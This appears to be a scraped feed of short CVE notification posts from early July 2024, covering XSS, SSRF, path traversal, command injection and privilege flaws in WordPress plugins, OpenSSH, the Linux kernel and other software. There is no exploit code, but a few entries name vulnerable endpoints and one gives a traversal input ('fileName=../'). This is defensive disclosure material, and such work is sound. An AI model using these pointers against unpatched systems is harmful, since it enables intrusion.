🚨 CVE-2024-37554Improper Neutralization of Input During Web Page Generation (XSS or 'Cross-site Scripting') vulnerability in CodeAstrology Team UltraAddons Elementor Lite (Header & Footer Builder, Menu Builder, Cart Icon, Shortcode).This issue affects UltraAddons Elementor Lite (Header & Footer Builder, Menu Builder, Cart Icon, Shortcode): from n/a through 1.1.6.🎖@cveNotify |
|
| 2024-07-06 16:37:26 |
🚨 CVE-2024-37553Improper Neutralization of Input During Web Page Generation (XSS or 'Cross-site Scripting') vulnerability in Axelerant Testimonials Widget allows Stored XSS.This issue affects Testimonials Widget: from n/a through 4.0.4.🎖@cveNotify |
|
| 2024-07-06 15:38:11 |
🚨 CVE-2024-37547Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal') vulnerability in Livemesh Livemesh Addons for Elementor.This issue affects Livemesh Addons for Elementor: from n/a through 8.3.7.🎖@cveNotify |
|
| 2024-07-06 15:38:10 |
🚨 CVE-2024-37546Improper Neutralization of Input During Web Page Generation (XSS or 'Cross-site Scripting') vulnerability in biplob018 Image Hover Effects - Caption Hover with Carousel allows Stored XSS.This issue affects Image Hover Effects - Caption Hover with Carousel: from n/a through 3.0.2.🎖@cveNotify |
|
| 2024-07-06 13:38:05 |
🚨 CVE-2024-37541Improper Neutralization of Input During Web Page Generation (XSS or 'Cross-site Scripting') vulnerability in StaxWP Elementor Addons, Widgets and Enhancements – Stax allows Stored XSS.This issue affects Elementor Addons, Widgets and Enhancements – Stax: from n/a through 1.4.4.1.🎖@cveNotify |
|
| 2024-07-06 13:38:04 |
🚨 CVE-2024-37539Improper Neutralization of Input During Web Page Generation (XSS or 'Cross-site Scripting') vulnerability in Delower WP To Do allows Stored XSS.This issue affects WP To Do: from n/a through 1.3.0.🎖@cveNotify |
|
| 2024-07-06 10:37:25 |
🚨 CVE-2024-37234URL Redirection to Untrusted Site ('Open Redirect') vulnerability in Kodezen Limited Academy LMS.This issue affects Academy LMS: from n/a through 2.0.4.🎖@cveNotify |
|
| 2024-07-06 10:37:24 |
🚨 CVE-2024-37208Server-Side Request Forgery (SSRF) vulnerability in Robert Macchi WP Scraper.This issue affects WP Scraper: from n/a through 5.7.🎖@cveNotify |
|
| 2024-07-06 09:37:24 |
🚨 CVE-2024-5616A Cross-Site Request Forgery (CSRF) vulnerability exists in mudler/LocalAI versions up to and including 2.15.0, which allows attackers to trick victims into deleting installed models. By crafting a malicious HTML page, an attacker can cause the deletion of a model, such as 'gpt-4-vision-preview', without the victim's consent. The vulnerability is due to insufficient CSRF protection mechanisms on the model deletion functionality.🎖@cveNotify |
|
| 2024-07-06 05:37:56 |
🚨 CVE-2024-6387A security regression (CVE-2006-5051) was discovered in OpenSSH's server (sshd). There is a race condition which can lead to sshd to handle some signals in an unsafe manner. An unauthenticated, remote attacker may be able to trigger it by failing to authenticate within a set time period.🎖@cveNotify |
|
| 2024-07-05 23:38:01 |
🚨 CVE-2024-39182An information disclosure vulnerability in ISPmanager v6.98.0 allows attackers to access sensitive details of the root user's session via an arbitrary command (ISP6-1779).🎖@cveNotify |
|
| 2024-07-05 23:37:55 |
🚨 CVE-2024-33862A buffer-management vulnerability in OPC Foundation OPCFoundation.NetStandard.Opc.Ua.Core before 1.05.374.54 could allow remote attackers to exhaust memory resources. It is triggered when the system receives an excessive number of messages from a remote source. This could potentially lead to a denial of service (DoS) condition, disrupting the normal operation of the system.🎖@cveNotify |
|
| 2024-07-05 23:37:54 |
🚨 CVE-2024-6387A security regression (CVE-2006-5051) was discovered in OpenSSH's server (sshd). There is a race condition which can lead to sshd to handle some signals in an unsafe manner. An unauthenticated, remote attacker may be able to trigger it by failing to authenticate within a set time period.🎖@cveNotify |
|
| 2024-07-05 23:37:53 |
🚨 CVE-2024-0986A vulnerability was found in Issabel PBX 4.0.0. It has been rated as critical. This issue affects some unknown processing of the file /index.php?menu=asterisk_cli of the component Asterisk-Cli. The manipulation of the argument Command leads to os command injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-252251. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.🎖@cveNotify |
|
| 2024-07-05 22:37:37 |
🚨 CVE-2024-26621In the Linux kernel, the following vulnerability has been resolved:mm: huge_memory: don't force huge page alignment on 32 bitcommit efa7df3e3bb5 ("mm: align larger anonymous mappings on THPboundaries") caused two issues [1] [2] reported on 32 bit system or compatuserspace.It doesn't make too much sense to force huge page alignment on 32 bitsystem due to the constrained virtual address space.[1] https://lore.kernel.org/linux-mm/d0a136a0-4a31-46bc-adf4-2db109a61672@kernel.org/[2] https://lore.kernel.org/linux-mm/CAJuCfpHXLdQy1a2B6xN2d7quTYwg2OoZseYPZTRpU0eHHKD-sQ@mail.gmail.com/🎖@cveNotify |
|
| 2024-07-05 21:37:52 |
🚨 CVE-2023-33281The remote keyfob system on Nissan Sylphy Classic 2021 sends the same RF signal for each door-open request, which allows for a replay attack. NOTE: the vendor's position is that this cannot be reproduced with genuine Nissan parts: for example, the combination of keyfob and door handle shown in the exploit demonstration does not match any technology that Nissan provides to customers.🎖@cveNotify |
|
| 2024-07-05 21:37:51 |
🚨 CVE-2023-30402YASM v1.3.0 was discovered to contain a heap overflow via the function handle_dot_label at /nasm/nasm-token.re. Note: This has been disputed by third parties who argue this is a bug and not a security issue because yasm is a standalone program not designed to run untrusted code.🎖@cveNotify |
|
| 2024-07-05 20:37:45 |
🚨 CVE-2023-26756The login page of Revive Adserver v5.4.1 is vulnerable to brute force attacks. NOTE: The vendor's position is that this is effectively mitigated by rate limits and password-quality features.🎖@cveNotify |
|
| 2024-07-05 19:37:41 |
🚨 CVE-2024-39023idccms v1.35 was discovered to contain a Cross-Site Request Forgery (CSRF) vulnerability via admin/info_deal.php?mudi=add&nohrefStr=close🎖@cveNotify |
|
| 2024-07-05 19:37:36 |
🚨 CVE-2024-39021idccms v1.35 was discovered to contain a Cross-Site Request Forgery (CSRF) via the component http://127.0.0.1:80/admin/vpsApiData_deal.php?mudi=del🎖@cveNotify |
|
| 2024-07-05 19:37:35 |
🚨 CVE-2024-34361Pi-hole is a DNS sinkhole that protects devices from unwanted content without installing any client-side software. A vulnerability in versions prior to 5.18.3 allows an authenticated user to make internal requests to the server via the `gravity_DownloadBlocklistFromUrl()` function. Depending on some circumstances, the vulnerability could lead to remote command execution. Version 5.18.3 contains a patch for this issue.🎖@cveNotify |
|
| 2024-07-05 18:37:44 |
🚨 CVE-2024-39687Fedify is a TypeScript library for building federated server apps powered by ActivityPub and other standards. At present, when Fedify needs to retrieve an object or activity from a remote activitypub server, it makes a HTTP request to the `@id` or other resources present within the activity it has received from the web. This activity could reference an `@id` that points to an internal IP address, allowing an attacker to send request to resources internal to the fedify server's network. This applies to not just resolution of documents containing activities or objects, but also to media URLs as well. Specifically this is a Server Side Request Forgery attack. Users should upgrade to Fedify version 0.9.2, 0.10.1, or 0.11.1 to receive a patch for this issue.🎖@cveNotify |
|
| 2024-07-05 18:37:43 |
🚨 CVE-2024-39174A cross-site scripting (XSS) vulnerability in the Publish Article function of yzmcms v7.1 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into a published article.🎖@cveNotify |
|
| 2024-07-05 18:37:42 |
🚨 CVE-2024-23083Time4J Base v5.9.3 was discovered to contain a NullPointerException via the component net.time4j.format.internal.FormatUtils::useDefaultWeekmodel(Locale). NOTE: this is disputed by multiple third parties who believe there was not reasonable evidence to determine the existence of a vulnerability. The submission may have been based on a tool that is not sufficiently robust for vulnerability identification.🎖@cveNotify |
|
| 2024-07-05 18:37:38 |
🚨 CVE-2024-23082ThreeTen Backport v1.6.8 was discovered to contain an integer overflow via the component org.threeten.bp.format.DateTimeFormatter::parse(CharSequence, ParsePosition). NOTE: this is disputed by multiple third parties who believe there was not reasonable evidence to determine the existence of a vulnerability. The submission may have been based on a tool that is not sufficiently robust for vulnerability identification.🎖@cveNotify |
|
| 2024-07-05 18:37:37 |
🚨 CVE-2024-28593The Chat activity in Moodle 4.3.3 allows students to insert a potentially unwanted HTML A element or IMG element, or HTML content that leads to a performance degradation. NOTE: the vendor's Using_Chat page says "If you know some HTML code, you can use it in your text to do things like insert images, play sounds or create different coloured and sized text." This page also says "Chat is due to be removed from standard Moodle."🎖@cveNotify |
|
| 2024-07-05 18:37:36 |
🚨 CVE-2024-2567** UNSUPPORTED WHEN ASSIGNED ** A vulnerability, which was classified as problematic, was found in jurecapuder AndroidWeatherApp 1.0.0 on Android. Affected is an unknown function of the file androidmanifest.xml of the component Backup File Handler. The manipulation leads to exposure of backup file to an unauthorized control sphere. It is possible to launch the attack on the physical device. The exploit has been disclosed to the public and may be used. VDB-257070 is the identifier assigned to this vulnerability. NOTE: This vulnerability only affects products that are no longer supported by the maintainer. NOTE: The code maintainer was contacted early about this disclosure but did not respond in any way. Instead the GitHub repository got deleted after a few days. We have to assume that the product is not supported anymore.🎖@cveNotify |
|
| 2024-07-05 18:37:33 |
🚨 CVE-2024-23492A weak encoding is used to transmit credentials for WS203VICM.🎖@cveNotify |
|
| 2024-07-05 18:37:32 |
🚨 CVE-2018-25098** UNSUPPORTED WHEN ASSIGNED ** A vulnerability was found in blockmason credit-protocol. It has been declared as problematic. Affected by this vulnerability is the function executeUcacTx of the file contracts/CreditProtocol.sol of the component UCAC Handler. The manipulation leads to denial of service. This product does not use versioning. This is why information about affected and unaffected releases are unavailable. The patch is named 082e01f18707ef995e80ebe97fcedb229a55efc5. It is recommended to apply a patch to fix this issue. The associated identifier of this vulnerability is VDB-252799. NOTE: This vulnerability only affects products that are no longer supported by the maintainer.🎖@cveNotify |
|
| 2024-07-05 18:37:31 |
🚨 CVE-2023-47867MachineSense FeverWarn devices are configured as Wi-Fi hosts in a way that attackers within range could connect to the device's web services and compromise the device.🎖@cveNotify |
|
| 2024-07-05 17:37:39 |
🚨 CVE-2024-34589Improper input validation in parsing RTCP RR packet in librtp.so prior to SMR Jul-2024 Release 1 allows remote attackers to trigger temporary denial of service. User interaction is required for triggering this vulnerability.🎖@cveNotify |
|
| 2024-07-05 17:37:33 |
🚨 CVE-2024-34588Improper input validation?in parsing RTCP SR packet in librtp.so prior to SMR Jul-2024 Release 1 allows remote attackers to trigger temporary denial of service. User interaction is required for triggering this vulnerability.🎖@cveNotify |
|
| 2024-07-05 17:37:32 |
🚨 CVE-2024-34585Improper access control in launchApp of SystemUI prior to SMR Jul-2024 Release 1 allows local attackers to launch privileged activities.🎖@cveNotify |
|
| 2024-07-05 17:37:31 |
🚨 CVE-2024-34583Improper access control in system property prior to SMR Jul-2024 Release 1 allows local attackers to get device identifier.🎖@cveNotify |
|
| 2024-07-05 17:37:28 |
🚨 CVE-2024-20901Improper input validation in copying data to buffer cache in libsaped prior to SMR Jul-2024 Release 1 allows local attackers to write out-of-bounds memory.🎖@cveNotify |
|
| 2024-07-05 17:37:27 |
🚨 CVE-2024-20900Improper authentication in MTP application prior to SMR Jul-2024 Release 1 allows local attackers to enter MTP mode without proper authentication.🎖@cveNotify |
|
| 2024-07-05 17:37:25 |
🚨 CVE-2023-29417An issue was discovered in libbzip3.a in bzip3 1.2.2. There is a bz3_decompress out-of-bounds read in certain situations where buffers passed to bzip3 do not contain enough space to be filled with decompressed data. NOTE: the vendor's perspective is that the observed behavior can only occur for a contract violation, and thus the report is invalid.🎖@cveNotify |
|
| 2024-07-05 17:07:47 |
🚨 CVE-2024-26314Improper privilege management in Jungo WinDriver 6.0.0 through 16.1.0 allows local attackers to escalate privileges and execute arbitrary code.🎖@cveNotify |
|
| 2024-07-05 17:07:41 |
🚨 CVE-2024-25088Improper privilege management in Jungo WinDriver before 12.5.1 allows local attackers to escalate privileges and execute arbitrary code.🎖@cveNotify |
|
| 2024-07-05 17:07:40 |
🚨 CVE-2024-22106Improper privilege management in Jungo WinDriver before 12.5.1 allows local attackers to escalate privileges, execute arbitrary code, or cause a Denial of Service (DoS).🎖@cveNotify |
|
| 2024-07-05 17:07:39 |
🚨 CVE-2024-22105Denial of Service (DoS) vulnerability in Jungo WinDriver before 12.5.1 allows local attackers to cause a Windows blue screen error.🎖@cveNotify |
|
| 2024-07-05 17:07:36 |
🚨 CVE-2024-22104Out-of-Bounds Write vulnerability in Jungo WinDriver before 12.5.1 allows local attackers to cause a Windows blue screen error and Denial of Service (DoS).🎖@cveNotify |
|
| 2024-07-05 17:07:35 |
🚨 CVE-2024-22102Denial of Service (DoS) vulnerability in Jungo WinDriver before 12.6.0 allows local attackers to cause a Windows blue screen error.🎖@cveNotify |
|
| 2024-07-05 17:07:34 |
🚨 CVE-2023-51777Denial of Service (DoS) vulnerability in Jungo WinDriver before 12.1.0 allows local attackers to cause a Windows blue screen error.🎖@cveNotify |
|
| 2024-07-05 16:38:12 |
🚨 CVE-2024-27309While an Apache Kafka cluster is being migrated from ZooKeeper mode to KRaft mode, in some cases ACLs will not be correctly enforced.Two preconditions are needed to trigger the bug:1. The administrator decides to remove an ACL2. The resource associated with the removed ACL continues to have two or more other ACLs associated with it after the removal.When those two preconditions are met, Kafka will treat the resource as if it had only one ACL associated with it after the removal, rather than the two or more that would be correct.The incorrect condition is cleared by removing all brokers in ZK mode, or by adding a new ACL to the affected resource. Once the migration is completed, there is no metadata loss (the ACLs all remain).The full impact depends on the ACLs in use. If only ALLOW ACLs were configured during the migration, the impact would be limited to availability impact. if DENY ACLs were configured, the impact could include confidentiality and integrity impact depending on the ACLs configured, as the DENY ACLs might be ignored due to this vulnerability during the migration period.🎖@cveNotify |
|
| 2024-07-05 16:38:11 |
🚨 CVE-2022-1941A parsing vulnerability for the MessageSet type in the ProtocolBuffers versions prior to and including 3.16.1, 3.17.3, 3.18.2, 3.19.4, 3.20.1 and 3.21.5 for protobuf-cpp, and versions prior to and including 3.16.1, 3.17.3, 3.18.2, 3.19.4, 3.20.1 and 4.21.5 for protobuf-python can lead to out of memory failures. A specially crafted message with multiple key-value per elements creates parsing issues, and can lead to a Denial of Service against services receiving unsanitized input. We recommend upgrading to versions 3.18.3, 3.19.5, 3.20.2, 3.21.6 for protobuf-cpp and 3.18.3, 3.19.5, 3.20.2, 4.21.6 for protobuf-python. Versions for 3.16 and 3.17 are no longer updated.🎖@cveNotify |
|
| 2024-07-05 16:08:11 |
🚨 CVE-2023-51776Improper privilege management in Jungo WinDriver before 12.1.0 allows local attackers to escalate privileges and execute arbitrary code.🎖@cveNotify |
|
| 2024-07-05 16:08:08 |
🚨 CVE-2024-20897Use of implicit intent for sensitive communication in FCM function in IMS service prior to SMR Jul-2024 Release 1 allows local attackers to get sensitive information.🎖@cveNotify |
|
| 2024-07-05 16:08:07 |
🚨 CVE-2024-20895Improper access control in Dar service prior to SMR Jul-2024 Release 1 allows local attackers to bypass restriction for calling SDP features.🎖@cveNotify |
|
| 2024-07-05 16:08:06 |
🚨 CVE-2024-20893Improper input validation in libmediaextractorservice.so prior to SMR Jul-2024 Release 1 allows local attackers to trigger memory corruption.🎖@cveNotify |
|
| 2024-07-05 16:08:02 |
🚨 CVE-2024-20891Improper access control in launchFullscreenIntent of SystemUI prior to SMR Jul-2024 Release 1 allows local attackers to launch privileged activities.🎖@cveNotify |
|
| 2024-07-05 16:08:01 |
🚨 CVE-2024-6387A security regression (CVE-2006-5051) was discovered in OpenSSH's server (sshd). There is a race condition which can lead to sshd to handle some signals in an unsafe manner. An unauthenticated, remote attacker may be able to trigger it by failing to authenticate within a set time period.🎖@cveNotify |
|
| 2024-07-05 15:37:29 |
🚨 CVE-2024-39864The CloudStack integration API service allows running its unauthenticated API server (usually on port 8096 when configured and enabled via integration.api.port global setting) for internal portal integrations and for testing purposes. By default, the integration API service port is disabled and is considered disabled when integration.api.port is set to 0 or negative. Due to an improper initialisation logic, the integration API service would listen on a random port when its port value is set to 0 (default value). An attacker that can access the CloudStack management network could scan and find the randomised integration API service port and exploit it to perform unauthorised administrative actions and perform remote code execution on CloudStack managed hosts and result in complete compromise of the confidentiality, integrity, and availability of CloudStack managed infrastructure.Users are recommended to restrict the network access on the CloudStack management server hosts to only essential ports. Users are recommended to upgrade to version 4.18.2.1, 4.19.0.2 or later, which addresses this issue.🎖@cveNotify |
|
| 2024-07-05 15:37:28 |
🚨 CVE-2024-5545The Motors – Car Dealer, Classifieds & Listing plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the stm_edit_delete_user_car function in all versions up to, and including, 1.4.8. This makes it possible for unauthenticated attackers to unpublish arbitrary posts and pages.🎖@cveNotify |
|
| 2024-07-05 15:37:27 |
🚨 CVE-2024-6387A security regression (CVE-2006-5051) was discovered in OpenSSH's server (sshd). There is a race condition which can lead to sshd to handle some signals in an unsafe manner. An unauthenticated, remote attacker may be able to trigger it by failing to authenticate within a set time period.🎖@cveNotify |
|
| 2024-07-05 15:07:54 |
🚨 CVE-2024-5504The Rife Elementor Extensions & Templates plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'tag' attribute within the plugin's Writing Effect Headline widget in all versions up to, and including, 1.2.1 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.🎖@cveNotify |
|
| 2024-07-05 14:38:43 |
🚨 CVE-2024-23588HCL Nomad server on Domino fails to properly handle users configured with limited Domino access resulting in a possible denial of service vulnerability.🎖@cveNotify |
|
| 2024-07-05 14:38:39 |
🚨 CVE-2024-6525** UNSUPPORTED WHEN ASSIGNED ** A vulnerability was found in D-Link DAR-7000 up to 20230922. It has been rated as problematic. Affected by this issue is some unknown functionality of the file /log/decodmail.php. The manipulation of the argument file leads to deserialization. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-270368. NOTE: This vulnerability only affects products that are no longer supported by the maintainer.🎖@cveNotify |
|
| 2024-07-05 14:38:38 |
🚨 CVE-2024-5938The Boot Store theme for WordPress is vulnerable to Stored Cross-Site Scripting via the ‘link’ parameter within the theme's Button shortcode in all versions up to, and including, 1.6.4 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.🎖@cveNotify |
|
| 2024-07-05 14:38:37 |
🚨 CVE-2023-5527The Business Directory Plugin plugin for WordPress is vulnerable to CSV Injection in versions up to, and including, 6.4.3 via the class-csv-exporter.php file. This allows authenticated attackers, with author-level permissions and above, to embed untrusted input into CSV files exported by administrators, which can result in code execution when these files are downloaded and opened on a local system with a vulnerable configuration.🎖@cveNotify |
|
| 2024-07-05 14:08:26 |
🚨 CVE-2024-5533The Divi theme for WordPress is vulnerable to Stored Cross-Site Scripting in all versions up to, and including, 4.25.1 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Author-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.🎖@cveNotify |
|
| 2024-07-05 14:08:22 |
🚨 CVE-2024-4094The Simple Share Buttons Adder WordPress plugin before 8.5.1 does not sanitise and escape some of its settings, which could allow high privilege users such as editors to perform Cross-Site Scripting attacks even when unfiltered_html is disallowed🎖@cveNotify |
|
| 2024-07-05 14:08:21 |
🚨 CVE-2024-5860The Tickera – WordPress Event Ticketing plugin for WordPress is vulnerable to unauthorized loss of data due to a missing capability check on the tc_dl_delete_tickets AJAX action in all versions up to, and including, 3.5.2.8. This makes it possible for authenticated attackers, with Subscriber-level access and above, to delete all tickets associated with events.🎖@cveNotify |
|
| 2024-07-05 14:08:20 |
🚨 CVE-2024-5541The Ibtana – WordPress Website Builder plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the 'ibtana_visual_editor_register_ajax_json_endpont' function in all versions up to, and including, 1.2.3.3. This makes it possible for unauthenticated attackers to update option values for reCAPTCHA keys on the WordPress site. This can be leveraged to bypass reCAPTCHA on the site.🎖@cveNotify |
|
| 2024-07-05 13:37:31 |
🚨 CVE-2024-4375The Master Slider – Responsive Touch Slider plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'ms_layer' shortcode in all versions up to, and including, 3.9.10 due to insufficient input sanitization and output escaping on the 'css_id' user supplied attribute. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.🎖@cveNotify |
|
| 2024-07-05 13:37:30 |
🚨 CVE-2024-1634The Scheduling Plugin – Online Booking for WordPress plugin for WordPress is vulnerable to unauthorized loss of data due to a missing capability check on the 'cbsb_disconnect_settings' function in all versions up to, and including, 3.5.10. This makes it possible for unauthenticated attackers to disconnect the plugin from the startbooking service and remove connection data.🎖@cveNotify |
|
| 2024-07-05 13:37:26 |
🚨 CVE-2024-3707Information exposure vulnerability in OpenGnsys affecting version 1.1.1d (Espeto). This vulnerability allows an attacker to enumerate all files in the web tree by accessing a php file.🎖@cveNotify |
|
| 2024-07-05 13:37:25 |
🚨 CVE-2024-3705Unrestricted file upload vulnerability in OpenGnsys affecting version 1.1.1d (Espeto). This vulnerability allows an attacker to send a POST request to the endpoint '/opengnsys/images/M_Icons.php' modifying the file extension, due to lack of file extension verification, resulting in a webshell injection.🎖@cveNotify |
|
| 2024-07-05 13:37:24 |
🚨 CVE-2024-3704SQL Injection Vulnerability has been found on OpenGnsys product affecting version 1.1.1d (Espeto). This vulnerability allows an attacker to inject malicious SQL code into login page to bypass it or even retrieve all the information stored in the database.🎖@cveNotify |
|
| 2024-07-05 08:37:26 |
🚨 CVE-2024-27397In the Linux kernel, the following vulnerability has been resolved:netfilter: nf_tables: use timestamp to check for set element timeoutAdd a timestamp field at the beginning of the transaction, store itin the nftables per-netns area.Update set backend .insert, .deactivate and sync gc path to use thetimestamp, this avoids that an element expires while control planetransaction is still unfinished..lookup and .update, which are used from packet path, still use thecurrent time to check if the element has expired. And .get path and dumpalso since this runs lockless under rcu read size lock. Then, there isasync gc which also needs to check the current time since it runsasynchronously from a workqueue.🎖@cveNotify |
|
| 2024-07-05 08:37:25 |
🚨 CVE-2023-52628In the Linux kernel, the following vulnerability has been resolved:netfilter: nftables: exthdr: fix 4-byte stack OOB writeIf priv->len is a multiple of 4, then dst[len / 4] can write pastthe destination array which leads to stack corruption.This construct is necessary to clean the remainder of the registerin case ->len is NOT a multiple of the register size, so make itconditional just like nft_payload.c does.The bug was added in 4.1 cycle and then copied/inherited whentcp/sctp and ip option support was added.Bug reported by Zero Day Initiative project (ZDI-CAN-21950,ZDI-CAN-21951, ZDI-CAN-21961).🎖@cveNotify |
|
| 2024-07-05 08:37:24 |
🚨 CVE-2021-47002In the Linux kernel, the following vulnerability has been resolved:SUNRPC: Fix null pointer dereference in svc_rqst_free()When alloc_pages_node() returns null in svc_rqst_alloc(), thenull rq_scratch_page pointer will be dereferenced when callingput_page() in svc_rqst_free(). Fix it by adding a null check.Addresses-Coverity: ("Dereference after null check")🎖@cveNotify |
|
| 2024-07-05 02:37:29 |
🚨 CVE-2023-52340The IPv6 implementation in the Linux kernel before 6.3 has a net/ipv6/route.c max_size threshold that can be consumed easily, e.g., leading to a denial of service (network is unreachable errors) when IPv6 packets are sent in a loop via a raw socket.🎖@cveNotify |
|
| 2024-07-04 23:38:02 |
🚨 CVE-2024-39943rejetto HFS (aka HTTP File Server) 3 before 0.52.10 on Linux, UNIX, and macOS allows OS command execution by remote authenticated users (if they have Upload permissions). This occurs because a shell is used to execute df (i.e., with execSync instead of spawnSync in child_process in Node.js).🎖@cveNotify |
|
| 2024-07-04 22:37:25 |
🚨 CVE-2024-39937supOS 5.0 allows api/image/download?fileName=../ directory traversal for reading files.🎖@cveNotify |
|
| 2024-07-04 19:38:01 |
🚨 CVE-2024-6511A vulnerability classified as problematic was found in y_project RuoYi up to 4.7.9. Affected by this vulnerability is the function isJsonRequest of the component Content-Type Handler. The manipulation of the argument HttpHeaders.CONTENT_TYPE leads to cross site scripting. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-270343.🎖@cveNotify |
|
| 2024-07-04 19:38:00 |
🚨 CVE-2024-37471Cross Site Scripting (XSS) vulnerability in WofficeIO Woffice Core allows Reflected XSS.This issue affects Woffice Core: from n/a through 5.4.8.🎖@cveNotify |
|
| 2024-07-04 18:37:59 |
🚨 CVE-2024-37476Cross Site Scripting (XSS) vulnerability in Automattic Newspack Campaigns allows Stored XSS.This issue affects Newspack Campaigns: from n/a through 2.31.1.🎖@cveNotify |
|
| 2024-07-04 13:37:40 |
🚨 CVE-2024-6506Information exposure vulnerability in the MRW plugin, in its 5.4.3 version, affecting the "mrw_log" functionality. This vulnerability could allow a remote attacker to obtain other customers' order information and access sensitive information such as name and phone number. This vulnerability also allows an attacker to create or overwrite shipping labels.🎖@cveNotify |
|
| 2024-07-04 13:37:39 |
🚨 CVE-2024-39165QR/demoapp/qr_image.php in Asial JpGraph Professional through 4.2.6-pro allows remote attackers to execute arbitrary code via a PHP payload in the data parameter in conjunction with a .php file name in the filename parameter. This occurs because an unnecessary QR/demoapp folder.is shipped with the product.🎖@cveNotify |
|
| 2024-07-04 04:38:10 |
🚨 CVE-2024-3639The Elementor Addons by Livemesh plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's Posts Grid widget in all versions up to, and including, 8.3.7 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.🎖@cveNotify |
|
| 2024-07-04 04:38:09 |
🚨 CVE-2024-2385The Elementor Addons by Livemesh plugin for WordPress is vulnerable to Local File Inclusion in all versions up to, and including, 8.3.7 via several of the plugin's widgets through the 'style' attribute. This makes it possible for authenticated attackers, with contributor-level access and above, to include and execute arbitrary files on the server, allowing the execution of any PHP code in those files. This can be used to bypass access controls, obtain sensitive data, or achieve code execution in cases where images and other “safe” file types can be uploaded and included.🎖@cveNotify |
|
| 2024-07-03 23:37:25 |
🚨 CVE-2024-21821Multiple TP-LINK products allow a network-adjacent authenticated attacker with access to the product from the LAN port or Wi-Fi to execute arbitrary OS commands.🎖@cveNotify |
|
| 2024-07-03 23:37:24 |
🚨 CVE-2024-21773Multiple TP-LINK products allow a network-adjacent unauthenticated attacker with access to the product from the LAN port or Wi-Fi to execute arbitrary OS commands on the product that has pre-specified target devices and blocked URLs in parental control settings.🎖@cveNotify |
|
| 2024-07-03 20:38:47 |
🚨 CVE-2024-34750Improper Handling of Exceptional Conditions, Uncontrolled Resource Consumption vulnerability in Apache Tomcat. When processing an HTTP/2 stream, Tomcat did not handle some cases of excessive HTTP headers correctly. This led to a miscounting of active HTTP/2 streams which in turn led to the use of an incorrect infinite timeout which allowed connections to remain open which should have been closed.This issue affects Apache Tomcat: from 11.0.0-M1 through 11.0.0-M20, from 10.1.0-M1 through 10.1.24, from 9.0.0-M1 through 9.0.89.Users are recommended to upgrade to version 11.0.0-M21, 10.1.25 or 9.0.90, which fixes the issue.🎖@cveNotify |
|
| 2024-07-03 20:38:46 |
🚨 CVE-2024-29508Artifex Ghostscript before 10.03.0 has a heap-based pointer disclosure (observable in a constructed BaseFont name) in the function pdf_base_font_alloc.🎖@cveNotify |
|
| 2024-07-03 20:38:43 |
🚨 CVE-2024-34590Improper input validation혻in parsing an item type from RTCP SDES packet in librtp.so prior to SMR Jul-2024 Release 1 allows remote attackers to trigger temporary denial of service. User interaction is required for triggering this vulnerability.🎖@cveNotify |
|
| 2024-07-03 20:38:42 |
🚨 CVE-2023-24099TrendNet Wireless AC Easy-Upgrader TEW-820AP v1.0R, firmware version 1.01.B01 was discovered to contain a stack overflow via the username parameter at /formWizardPassword. This vulnerability allows attackers to execute arbitrary code via a crafted payload. NOTE: This vulnerability only affects products that are no longer supported by the maintainer.🎖@cveNotify |
|
| 2024-07-03 20:38:41 |
🚨 CVE-2023-24040dtprintinfo in Common Desktop Environment 1.6 has a bug in the parser of lpstat (an invoked external command) during listing of the names of available printers. This allows low-privileged local users to inject arbitrary printer names via the $HOME/.printers file. This injection allows those users to manipulate the control flow and disclose memory contents on Solaris 10 systems. NOTE: This vulnerability only affects products that are no longer supported by the maintainer.🎖@cveNotify |
|
| 2024-07-03 18:37:42 |
🚨 CVE-2024-29508Artifex Ghostscript before 10.0.3.0 has a heap-based pointer disclosure (observable in a constructed BaseFont name) in the function pdf_base_font_alloc.🎖@cveNotify |
|
| 2024-07-03 18:37:41 |
🚨 CVE-2023-52169The NtfsHandler.cpp NTFS handler in 7-Zip before 24.01 (for 7zz) contains an out-of-bounds read that allows an attacker to read beyond the intended buffer. The bytes read beyond the intended buffer are presented as a part of a filename listed in the file system image. This has security relevance in some known web-service use cases where untrusted users can upload files and have them extracted by a server-side 7-Zip process.🎖@cveNotify |
|
| 2024-07-03 18:37:37 |
🚨 CVE-2024-39844In ZNC before 1.9.1, remote code execution can occur in modtcl via a KICK.🎖@cveNotify |
|
| 2024-07-03 18:37:36 |
🚨 CVE-2024-6263The WP Lightbox 2 plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the ‘title’ parameter in all versions up to, and including, 3.0.6.6 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.🎖@cveNotify |
|
| 2024-07-03 18:37:35 |
🚨 CVE-2024-4482The The Plus Addons for Elementor – Elementor Addons, Page Templates, Widgets, Mega Menu, WooCommerce plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'Countdown' widget in all versions up to, and including, 5.6.1 due to insufficient input sanitization and output escaping on user supplied 'text_days' attribute. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.🎖@cveNotify |
|
| 2024-07-03 18:37:32 |
